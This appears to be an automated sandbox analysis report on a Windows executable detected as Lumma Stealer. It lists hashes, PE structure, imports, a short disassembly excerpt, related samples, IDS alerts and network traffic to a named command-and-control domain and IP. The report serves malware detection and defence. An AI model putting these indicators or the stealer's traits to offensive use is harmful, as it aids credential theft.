                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:iq2HxA0SLw.exe
                renamed because original name is a hash value
                Original Sample Name:da6f9e46eacbde011e7d9a6e742d05c9.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@3/0@2/1
                EGA Information:
                • Successful, ratio: 50%
                HCA Information:Failed
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target iq2HxA0SLw.exe, PID 2992 because there are no executed function
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: iq2HxA0SLw.exe
                TimeTypeDescription
                03:46:59API Interceptor2x Sleep call for process: BitLockerToGo.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                104.21.37.97file.exeGet hashmaliciousLummaCBrowse
                  LaWl4DY2kW.exeGet hashmaliciousLummaCBrowse
                    file.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                      File.exeGet hashmaliciousLummaCBrowse
                        SetupPowerGREP.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                            file.exeGet hashmaliciousLummaCBrowse
                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  racedsuitreow.shopfile.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.37.97
                                  LcDQjpdIiU.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.206.221
                                  BLHvvl44N0.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                  • 172.67.206.221
                                  LcDQjpdIiU.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.206.221
                                  ptgl503.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.206.221
                                  0x000e00000001da78-93.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.206.221
                                  LaWl4DY2kW.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.37.97
                                  file.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                  • 104.21.37.97
                                  File.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.37.97
                                  SetupPowerGREP.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                  • 104.21.37.97
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  CLOUDFLARENETUSPayment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 188.114.96.3
                                  RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                  • 104.26.13.205
                                  QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 188.114.96.3
                                  Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 188.114.96.3
                                  450230549.exeGet hashmaliciousAgentTeslaBrowse
                                  • 162.159.134.233
                                  64.exeGet hashmaliciousUnknownBrowse
                                  • 162.159.61.3
                                  450230549.exeGet hashmaliciousUnknownBrowse
                                  • 162.159.134.233
                                  PO-100001499.exeGet hashmaliciousFormBookBrowse
                                  • 188.114.96.3
                                  ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                  • 104.21.64.108
                                  TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                  • 188.114.96.3
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  a0e9f5d64349fb13191bc781f81f42e1https://tiktoksc.tv/wapGet hashmaliciousUnknownBrowse
                                  • 104.21.37.97
                                  https://xtrafree.x10.mx/Get hashmaliciousUnknownBrowse
                                  • 104.21.37.97
                                  PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
                                  • 104.21.37.97
                                  PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
                                  • 104.21.37.97
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.37.97
                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                  • 104.21.37.97
                                  HHXyi02DYl.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.37.97
                                  bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.37.97
                                  LcDQjpdIiU.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.37.97
                                  BLHvvl44N0.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                  • 104.21.37.97
                                  No context
                                  No created / dropped files found
                                  File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                  Entropy (8bit):5.182237533258545
                                  TrID:
                                  • Win64 Executable (generic) (12005/4) 74.95%
                                  • Generic Win/DOS Executable (2004/3) 12.51%
                                  • DOS Executable Generic (2002/1) 12.50%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                  File name:iq2HxA0SLw.exe
                                  File size:19'231'232 bytes
                                  MD5:da6f9e46eacbde011e7d9a6e742d05c9
                                  SHA1:a022be00f60db2721120fbbf2acdd4435e86706a
                                  SHA256:ac4b0d4dbdb661c626eef6c128ab65bbf2de3112dde7ef4d526520d1bae9d29f
                                  SHA512:7ea89b332305db5d3daa7142b9f6e2b3aaacca0c183c01b44fa1b550b64888873d281a45069747e0189b3f54fad7fce990b9032f830877542cf6ddedabd05159
                                  SSDEEP:98304:NTTeIGekR9MTdlL+E9Qep3gnevWXNDlUwrGdEdhG+V/69hiVwXFE0:wUHL+E9Qehgne+9prGOdA+4WR0
                                  TLSH:D5173947E9A544E8C1EDD538852682267B71BC498B3037D73B60F6782F72BC0AEB9354
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$..e..n%..*.............@............................. /.......%...`... ............................
                                  Icon Hash:0c0c2d33ceec80aa
                                  Entrypoint:0x1400014c0
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x140000000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                  TLS Callbacks:0x40652c20, 0x1, 0x40652bf0, 0x1, 0x40656690, 0x1
                                  CLR (.Net) Version:
                                  OS Version Major:6
                                  OS Version Minor:1
                                  File Version Major:6
                                  File Version Minor:1
                                  Subsystem Version Major:6
                                  Subsystem Version Minor:1
                                  Import Hash:c595f1660e1a3c84f4d9b0761d23cd7a
                                  Instruction
                                  dec eax
                                  sub esp, 28h
                                  dec eax
                                  mov eax, dword ptr [011FDBD5h]
                                  mov dword ptr [eax], 00000001h
                                  call 00007EFDF95C8DCFh
                                  nop
                                  nop
                                  dec eax
                                  add esp, 28h
                                  ret
                                  nop dword ptr [eax]
                                  dec eax
                                  sub esp, 28h
                                  dec eax
                                  mov eax, dword ptr [011FDBB5h]
                                  mov dword ptr [eax], 00000000h
                                  call 00007EFDF95C8DAFh
                                  nop
                                  nop
                                  dec eax
                                  add esp, 28h
                                  ret
                                  nop dword ptr [eax]
                                  dec eax
                                  sub esp, 28h
                                  call 00007EFDF9C2560Ch
                                  dec eax
                                  test eax, eax
                                  sete al
                                  movzx eax, al
                                  neg eax
                                  dec eax
                                  add esp, 28h
                                  ret
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  dec eax
                                  lea ecx, dword ptr [00000009h]
                                  jmp 00007EFDF95C90E9h
                                  nop dword ptr [eax+00h]
                                  ret
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  jmp dword ptr [eax]
                                  inc edi
                                  outsd
                                  and byte ptr [edx+75h], ah
                                  imul ebp, dword ptr [esp+20h], 203A4449h
                                  and ah, byte ptr [esi+73h]
                                  xor al, 6Dh
                                  push 00000078h
                                  outsb
                                  push 00000074h
                                  dec ecx
                                  arpl word ptr [eax], di
                                  dec ebx
                                  pop edx
                                  aaa
                                  imul ecx, dword ptr [ebx+58h], 30h
                                  das
                                  pop edi
                                  push ecx
                                  inc edi
                                  push edx
                                  push 00000070h
                                  inc ebx
                                  xor eax, 36734C6Dh
                                  push dx
                                  push 00000069h
                                  js 00007EFDF95C9173h
                                  push edx
                                  das
                                  push edx
                                  arpl word ptr [ebx+ebp*2+4Dh], sp
                                  pop edi
                                  inc ebx
                                  pop edx
                                  xor ah, byte ptr [si+69h]
                                  jp 00007EFDF95C9183h
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x12ba0000x4e.edata
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x12bb0000x1458.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x12bf0000xe8f4.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x12000000x25698.pdata
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x12ce0000x23034.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x11fea000x28.rdata
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x12bb4940x458.idata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x65d1c00x65d2007b69be1a04fe8796814c1880afd9032dunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .data0x65f0000x722d00x724002c3229a14ac95278e353f7007b1f6c6dFalse0.31593613238512036dBase III DBT, version number 0, next free block index 10, 1st item "5.5\011h1:KKUZBfBoyqy5d3swXyiC7Q76ic40rYcbqH7qjh59kzU="4.869698553997173IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rdata0x6d20000xb2d8500xb2da00381aa7ad03412c9cbb3ba8f6449c0224unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                  .pdata0x12000000x256980x2580045605ed3913e8b9682bae002b083ee68False0.4016341145833333data5.87247973963546IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                  .xdata0x12260000xc600xe0003a34cf0b2e5f3021518c50e9ad81896False0.25948660714285715data4.004045761043318IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                  .bss0x12270000x929800x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .edata0x12ba0000x4e0x2006bc3495faf92c36fbe67ad93141651e0False0.1328125data0.9168902136227094IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                  .idata0x12bb0000x14580x1600e50527972d6afb1999a572992c114b2eFalse0.298828125data4.618021107573519IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .CRT0x12bd0000x700x2007439bad3ca22e9f5688b7cb117ceeae1False0.083984375data0.47677526113352753IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .tls0x12be0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x12bf0000xe8f40xea006bde4bae1c79bfeb462354d2c4f25d75False0.16457999465811965data3.4998392732394823IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .reloc0x12ce0000x230340x23200bca3a40f3d5a25c7e8607da3417042dfFalse0.20341692615658363data5.452689327163072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_ICON0x12bf3840xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                                  RT_ICON0x12bfdec0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                                  RT_ICON0x12c04540x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                                  RT_ICON0x12c073c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                                  RT_ICON0x12c08640x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                                  RT_ICON0x12c1e8c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                                  RT_ICON0x12c2d340x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                                  RT_ICON0x12c35dc0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                                  RT_ICON0x12c3b440x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                                  RT_ICON0x12c4e2c0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                                  RT_ICON0x12c90540x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                                  RT_ICON0x12cb5fc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                                  RT_ICON0x12cc6a40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                                  RT_GROUP_ICON0x12ccb0c0xbcdataEnglishUnited States0.6170212765957447
                                  RT_VERSION0x12ccbc80x584dataEnglishUnited States0.26770538243626063
                                  RT_MANIFEST0x12cd14c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                                  DLLImport
                                  KERNEL32.dllAddAtomA, AddVectoredContinueHandler, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreA, CreateThread, CreateWaitableTimerExW, DeleteAtom, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FindAtomA, FormatMessageA, FreeEnvironmentStringsW, GetAtomNameA, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetEnvironmentStringsW, GetErrorMode, GetHandleInformation, GetLastError, GetProcAddress, GetProcessAffinityMask, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryExW, LoadLibraryW, LocalFree, MultiByteToWideChar, OpenProcess, OutputDebugStringA, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, RaiseFailFastException, ReleaseMutex, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetErrorMode, SetEvent, SetLastError, SetProcessAffinityMask, SetProcessPriorityBoost, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler
                                  msvcrt.dll___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _lock, _memccpy, _onexit, _setjmp, _strdup, _ultoa, _unlock, abort, calloc, exit, fprintf, fputc, free, fwrite, localeconv, longjmp, malloc, memcpy, memmove, memset, printf, realloc, signal, strerror, strlen, strncmp, vfprintf, wcslen
                                  NameOrdinalAddress
                                  _cgo_dummy_export10x1412b8bb0
                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States
                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-09-26T09:47:00.715068+02002056078ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop)1192.168.2.9540441.1.1.153UDP
                                  2024-09-26T09:47:01.202824+02002056079ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)1192.168.2.949708104.21.37.97443TCP
                                  2024-09-26T09:47:01.378739+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949708104.21.37.97443TCP
                                  2024-09-26T09:47:01.378739+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949708104.21.37.97443TCP
                                  2024-09-26T09:47:01.975769+02002056079ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)1192.168.2.949709104.21.37.97443TCP
                                  2024-09-26T09:47:02.487821+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949709104.21.37.97443TCP
                                  2024-09-26T09:47:02.487821+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949709104.21.37.97443TCP
                                  TimestampSource PortDest PortSource IPDest IP
                                  Sep 26, 2024 09:47:00.732105017 CEST49708443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:00.732145071 CEST44349708104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:00.732207060 CEST49708443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:00.736118078 CEST49708443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:00.736133099 CEST44349708104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:01.202739954 CEST44349708104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:01.202824116 CEST49708443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:01.207156897 CEST49708443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:01.207165003 CEST44349708104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:01.207600117 CEST44349708104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:01.254381895 CEST49708443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:01.277460098 CEST49708443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:01.277460098 CEST49708443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:01.277604103 CEST44349708104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:01.378774881 CEST44349708104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:01.378848076 CEST44349708104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:01.378889084 CEST44349708104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:01.378911018 CEST49708443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:01.378926992 CEST44349708104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:01.378976107 CEST49708443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:01.378982067 CEST44349708104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:01.379034042 CEST44349708104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:01.379230022 CEST49708443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:01.382287979 CEST49708443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:01.382304907 CEST44349708104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:01.512253046 CEST49709443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:01.512298107 CEST44349709104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:01.512372971 CEST49709443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:01.512739897 CEST49709443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:01.512757063 CEST44349709104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:01.975689888 CEST44349709104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:01.975769043 CEST49709443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:01.977535963 CEST49709443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:01.977546930 CEST44349709104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:01.977879047 CEST44349709104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:01.979615927 CEST49709443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:01.979650021 CEST49709443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:01.979728937 CEST44349709104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:02.487885952 CEST44349709104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:02.488121033 CEST44349709104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:02.488245964 CEST49709443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:02.488569975 CEST49709443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:02.488593102 CEST44349709104.21.37.97192.168.2.9
                                  Sep 26, 2024 09:47:02.488609076 CEST49709443192.168.2.9104.21.37.97
                                  Sep 26, 2024 09:47:02.488615990 CEST44349709104.21.37.97192.168.2.9
                                  TimestampSource PortDest PortSource IPDest IP
                                  Sep 26, 2024 09:47:00.702846050 CEST4927453192.168.2.91.1.1.1
                                  Sep 26, 2024 09:47:00.711632967 CEST53492741.1.1.1192.168.2.9
                                  Sep 26, 2024 09:47:00.715068102 CEST5404453192.168.2.91.1.1.1
                                  Sep 26, 2024 09:47:00.724320889 CEST53540441.1.1.1192.168.2.9
